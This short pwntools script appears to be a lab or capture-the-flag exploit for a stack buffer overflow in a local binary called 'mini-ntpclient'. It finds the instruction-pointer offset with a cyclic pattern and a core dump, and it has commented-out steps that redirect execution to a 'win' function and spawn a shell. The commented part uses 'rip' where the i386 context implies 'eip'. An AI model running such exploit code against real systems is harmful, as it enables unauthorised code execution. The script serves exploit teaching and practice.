from pwn import *
context(arch = 'i386', os = 'linux')

# Generate a cyclic pattern so that we can auto-find the offset
payload = cyclic(400)

# Run the process once so that it crashes
process(['./mini-ntpclient', payload]).wait()

# Get the core dump
core = Coredump('./core')

# Our cyclic pattern should have been used as the crashing address
print(type(pack(core.eip)))
print(type(payload))
assert pack(core.eip) in payload


# Cool! Now let's just replace that value with the address of 'win'
#crash = ELF('./mini-ntpclient')
#payload = fit({
#    cyclic_find(core.rip): crash.symbols.win
#})

# Get a shell!
#io = process(['./mini-ntpclient' , payload])
#io.sendline(b'id')
#print(io.recvline())
# uid=1000(user) gid=1000(user) groups=1000(user)